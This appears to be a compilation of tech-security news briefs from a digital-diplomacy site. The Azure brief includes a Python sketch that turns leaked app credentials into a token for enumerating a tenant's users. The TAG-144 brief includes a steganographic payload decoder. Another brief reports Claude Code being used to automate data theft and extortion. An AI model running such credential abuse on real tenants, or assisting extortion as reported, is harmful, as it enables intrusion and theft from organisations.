DOGE transfers Social Security data to the cloud, sources say

A whistle-blower has reported that the Department of Government Efficiency (DOGE) allegedly transferred a copy of the US Social Security database to an Amazon Web Services cloud environment.

The action placed personal information for more than 300 million individuals in a system outside traditional federal oversight.

Known as NUMIDENT, the database contains information submitted for Social Security applications, including names, dates of birth, addresses, citizenship, and parental details.

DOGE personnel reportedly managed the cloud environment and gained administrative access to perform testing and operational tasks.

Federal officials have highlighted that standard security protocols and authorisations, such as those outlined under the Federal Information Security Management Act (FISMA) and the Privacy Act of 1974, are designed to protect sensitive data.

The transfer has prompted internal reviews and raised questions about compliance with established federal security practices.

While DOGE has not fully clarified the purpose of the cloud deployment, observers note that such initiatives may relate to broader federal efforts to improve data accessibility or inter-agency information sharing.

The case is part of ongoing discussions on balancing operational flexibility with information security in government systems.

Would you like to learn more about AI, tech and digital diplomacy? If so, ask our Diplo chatbot!

Azure Active Directory flaw exposes sensitive credentials

A critical security flaw in Azure Active Directory has exposed application credentials stored in appsettings.json files, allowing attackers unprecedented access to Microsoft 365 tenants.

By exploiting these credentials, threat actors can masquerade as trusted applications and gain unauthorised entry to sensitive organisational data.

The attack leverages the OAuth 2.0 client credentials flow: with a leaked client ID and secret, attackers can request valid access tokens directly from the Microsoft identity platform.

Once authenticated, they can access Microsoft Graph APIs to enumerate users, groups, and directory roles, especially when applications have been granted excessive permissions such as Directory.Read.All or Mail.Read. Such access permits data harvesting across SharePoint, OneDrive, and Exchange Online.
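
As a rough illustration of that abuse path (all identifiers below are hypothetical placeholders, not real values), a leaked client ID and secret are enough to obtain an app-only token and begin enumerating the directory:

```python
# Sketch of the abuse path described above. Requires the requests
# library; every identifier here is a hypothetical placeholder.
import requests

TENANT = "00000000-0000-0000-0000-000000000000"  # victim tenant ID

# Step 1: client credentials flow — a leaked ID/secret yields a valid token.
token_resp = requests.post(
    f"https://login.microsoftonline.com/{TENANT}/oauth2/v2.0/token",
    data={
        "grant_type": "client_credentials",
        "client_id": "LEAKED_CLIENT_ID",          # found in appsettings.json
        "client_secret": "LEAKED_CLIENT_SECRET",  # found in appsettings.json
        "scope": "https://graph.microsoft.com/.default",
    },
)
access_token = token_resp.json()["access_token"]

# Step 2: with a permission like Directory.Read.All, the token can
# enumerate users via Microsoft Graph.
users = requests.get(
    "https://graph.microsoft.com/v1.0/users",
    headers={"Authorization": f"Bearer {access_token}"},
)
print(users.json())
```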

Attackers can also deploy malicious applications under compromised tenants, escalating privileges from limited read access to complete administrative control.

Additional exposed secrets like storage account keys or database connection strings enable lateral movement, modification of critical data, and the creation of persistent backdoors within cloud infrastructure.

Organisations face profound compliance implications under GDPR, HIPAA, or SOX. The flaw underscores the importance of auditing configuration files, storing credentials in a dedicated secrets manager such as Azure Key Vault, and monitoring authentication patterns to detect long-term, sophisticated attacks.
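
A minimal sketch of that mitigation, using the azure-identity and azure-keyvault-secrets packages (the vault URL and secret name below are hypothetical):

```python
# Resolve secrets from Azure Key Vault at runtime instead of
# committing them to appsettings.json.
from azure.identity import DefaultAzureCredential
from azure.keyvault.secrets import SecretClient

client = SecretClient(
    vault_url="https://my-vault.vault.azure.net",  # hypothetical vault
    credential=DefaultAzureCredential(),           # managed identity, CLI, etc.
)
client_secret = client.get_secret("app-client-secret").value
```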

Would you like to learn more about AI, tech and digital diplomacy? If so, ask our Diplo chatbot!

How local LLMs are changing AI access

As AI adoption rises, more users explore running large language models (LLMs) locally instead of relying on cloud providers.

Local deployment gives individuals control over data, reduces costs, and avoids limits imposed by AI-as-a-service companies. Advances in consumer hardware and open-source tooling now let users experiment with AI on their own machines.

Concerns over privacy and data sovereignty are driving interest. Many cloud AI services retain user data for years, even when privacy assurances are offered.

By running models locally, companies and hobbyists can more easily meet GDPR obligations and keep control over sensitive information while still leveraging high-performance AI tools.

Hardware considerations like GPU memory and processing power are central to local LLM performance. Quantisation techniques allow models to run efficiently with reduced precision, enabling use on consumer-grade machines or enterprise hardware.
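
To make the arithmetic concrete, here is a back-of-the-envelope estimate of weight memory at different precisions (a sketch that ignores KV cache and runtime overhead):

```python
# Rough weight-memory estimate for an LLM: parameters × bits per weight.
# Ignores KV cache, activations, and framework overhead.
def model_memory_gb(params_billion: float, bits_per_weight: float) -> float:
    return params_billion * 1e9 * bits_per_weight / 8 / 1e9

print(f"{model_memory_gb(7, 16):.1f} GB")  # 14.0 GB at FP16 — workstation GPU
print(f"{model_memory_gb(7, 4):.1f} GB")   # 3.5 GB at 4-bit — consumer laptop
```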

Software frameworks like llama.cpp, Jan, and LM Studio simplify deployment, making local AI accessible to non-engineers and professionals across industries.
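
For instance, a minimal local-inference sketch with llama-cpp-python, the Python bindings for llama.cpp (the GGUF file path is a hypothetical placeholder; any quantised GGUF model works):

```python
# Load a quantised model and run a single completion locally.
from llama_cpp import Llama

llm = Llama(model_path="models/llama-7b-q4.gguf", n_ctx=2048)
out = llm("Explain data sovereignty in one sentence:", max_tokens=64)
print(out["choices"][0]["text"])
```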

Local models are suitable for personalised tasks, learning, coding assistance, and experimentation, although cloud models remain stronger for large-scale enterprise applications.

As tools and model quality improve, running AI on personal devices may become a standard alternative, giving users more control over cost, privacy, and performance.

Would you like to learn more about AI, tech and digital diplomacy? If so, ask our Diplo chatbot!

Salt Typhoon hack reveals fragility of global communications networks

The FBI has warned that Chinese hackers are exploiting structural weaknesses in global telecom infrastructure, following the Salt Typhoon incident that penetrated US networks on an unprecedented scale. Officials say the Beijing-linked group has compromised data from millions of Americans since 2019.

Unlike previous cyber campaigns focused narrowly on government targets, Salt Typhoon’s intrusions exposed how ordinary mobile users can be swept up in espionage. Call records, internet traffic, and even geolocation data were siphoned from carriers, with the operation spreading to more than 80 countries.

Investigators linked the campaign to three Chinese tech firms supplying products to intelligence agencies and China’s People’s Liberation Army. Experts warn that the attacks demonstrate the fragility of cross-border telecom systems, where a single compromised provider can expose entire networks.

US and allied agencies have urged providers to harden defences with encryption and stricter monitoring. Analysts caution that, without structural reforms, global telecoms will remain fertile ground for state-backed groups.

The revelations have intensified geopolitical tensions, with the FBI describing Salt Typhoon as one of the most reckless and far-reaching espionage operations ever detected.

Would you like to learn more about AI, tech, and digital diplomacy? If so, ask our Diplo chatbot!

Salesforce customers hit by OAuth token breach

Security researchers have warned Salesforce customers after hackers stole data by exploiting OAuth access tokens linked to the Salesloft Drift integration, highlighting a critical weakness in SaaS supply chains.

Google’s Threat Intelligence Group (GTIG) reported that the threat actor UNC6395 used the tokens to infiltrate hundreds of Salesforce environments, exporting large volumes of sensitive information. Stolen data included AWS keys, passwords, and Snowflake tokens.

Experts warn that compromised SaaS integrations pose a central blind spot, since attackers inherit the same permissions as trusted apps and can often bypass multifactor authentication. Investigations are ongoing to determine whether connected systems, such as AWS or VPNs, were also breached.
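
On the defensive side, a compromised token can be invalidated immediately through Salesforce's standard OAuth revocation endpoint. A minimal sketch (the token value is a placeholder, and rotating the integration's credentials is still required):

```python
# Revoke a suspect OAuth access or refresh token via Salesforce's
# documented /services/oauth2/revoke endpoint.
import requests

resp = requests.post(
    "https://login.salesforce.com/services/oauth2/revoke",
    data={"token": "SUSPECT_OAUTH_TOKEN"},  # placeholder value
)
print(resp.status_code)  # 200 means the token is no longer valid
```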

Would you like to learn more about AI, tech and digital diplomacy? If so, ask our Diplo chatbot!

Claude chatbot misused in unprecedented cyber extortion case

A hacker exploited Anthropic’s Claude chatbot to automate one of the most extensive AI-driven cybercrime operations yet recorded, targeting at least 17 companies across multiple sectors, the firm revealed.

According to Anthropic’s report, the attacker used Claude Code to identify vulnerable organisations, generate malicious software, and extract sensitive files, including defence data, financial records, and patients’ medical information.

The chatbot then sorted the stolen material, identified leverage for extortion, calculated realistic bitcoin demands, and even drafted ransom notes and extortion emails on behalf of the hacker.

Victims included a defence contractor, a financial institution, and healthcare providers. Extortion demands reportedly ranged from $75,000 to over $500,000, although it remains unclear how much was actually paid.

Anthropic declined to disclose the companies affected but confirmed new safeguards are in place. The firm warned that AI lowers the barrier to entry for sophisticated cybercrime, making such misuse increasingly likely.

Would you like to learn more about AI, tech, and digital diplomacy? If so, ask our Diplo chatbot!

Fragmenting digital identities with aliases offers added security

People often treat their email address as harmless, just a digital ID for receipts and updates. In reality, it acts as a skeleton key linking behaviour, purchases, and personal data across platforms.

Using the same email everywhere makes tracking easy. Companies may encrypt addresses, but behavioural patterns remain intact. Aliases disrupt this chain by creating unique addresses that forward mail without revealing your true identity.

Each alias doubles as a tripwire. If one is compromised or starts receiving spam, you know exactly which service leaked it, and the alias can simply be disabled, cutting off the problem at its source.
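
A minimal sketch of the idea using plus-addressing, which many mail providers support (dedicated alias services go further by hiding the base address entirely):

```python
# Generate a unique, per-service address via plus-addressing.
# Note: unlike a true alias service, the base mailbox stays visible.
def make_alias(base: str, service: str) -> str:
    user, domain = base.split("@")
    return f"{user}+{service}@{domain}"

print(make_alias("jane.doe@example.com", "newsstore"))
# jane.doe+newsstore@example.com — spam here pinpoints the leaking service.
```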

Aliases also reduce the fallout of data breaches. Instead of exposing your main email to countless third-party tools, scripts, and mailing platforms, an alias shields your core digital identity.

Beyond privacy, aliases encourage healthier habits. They force a pause before signing up, add structure through custom rules, and help fragment your identity, thereby lowering the risks associated with any single breach.

Would you like to learn more about AI, tech, and digital diplomacy? If so, ask our Diplo chatbot!

Anthropic updates Claude’s policy with new data training choices

US AI startup Anthropic has announced an update to its data policy for Claude users, introducing an option to allow conversations and coding sessions to be used for training future AI models.

Anthropic stated that all Claude Free, Pro, and Max users, including those using Claude Code, will be asked to make a decision by September 28, 2025.

According to Anthropic, users who opt in will permit retention of their conversations for up to five years, with the data contributing to improvements in areas such as reasoning, coding, and analysis.

Those who choose not to participate will continue under the current policy, where conversations are deleted within thirty days unless flagged for legal or policy reasons.

The new policy does not extend to enterprise products, including Claude for Work, Claude Gov, Claude for Education, or API access through partners like Amazon Bedrock and Google Cloud Vertex AI. These remain governed by separate contractual agreements.

Anthropic noted that the choice will also apply to new users during sign-up, while existing users will be prompted through notifications to review their privacy settings.

The company emphasised that users remain in control of their data and that manually deleted conversations will not be used for training.

Would you like to learn more about AI, tech and digital diplomacy? If so, ask our Diplo chatbot!

Espionage fears rise as TAG-144 evolves techniques

A threat group known as TAG-144 has stepped up cyberattacks on South American government agencies, researchers have warned.

The group, also called Blind Eagle and APT-C-36, has been active since 2018 and is linked to espionage and extortion campaigns. Recent activity shows a sharp rise in spear-phishing, often using spoofed government email accounts to deliver remote access trojans.

Analysts say the group has shifted towards more advanced methods, embedding malware inside image files through steganography. Payloads are then extracted in memory, allowing attackers to evade antivirus software and maintain access to compromised systems.
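
As a rough illustration of the class of technique described (not TAG-144's actual tooling), the classic least-significant-bit approach hides payload bytes in the low bits of pixel values. A minimal decode sketch using the Pillow library, with a hypothetical carrier image and an assumed 4-byte length prefix:

```python
# Decode data hidden in the least-significant bits of an image.
# "carrier.png" and the length-prefix layout are assumptions for
# illustration; real campaigns use more elaborate encodings.
from PIL import Image

img = Image.open("carrier.png").convert("RGB")
bits = []
for pixel in img.getdata():
    for channel in pixel:          # R, G, B values
        bits.append(channel & 1)   # keep only the lowest bit

# Reassemble bits into bytes (assume a 4-byte big-endian length prefix).
data = bytearray()
for i in range(0, len(bits) - 7, 8):
    byte = 0
    for b in bits[i:i + 8]:
        byte = (byte << 1) | b
    data.append(byte)

length = int.from_bytes(data[:4], "big")
payload = bytes(data[4:4 + length])  # hidden bytes, recovered in memory
```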

Colombian government institutions have been hit hardest, with stolen credentials and sensitive data raising concerns over both financial and national security risks. Security experts warn that TAG-144’s evolving tactics blur the line between organised crime and state-backed espionage.

Would you like to learn more about AI, tech and digital diplomacy? If so, ask our Diplo chatbot!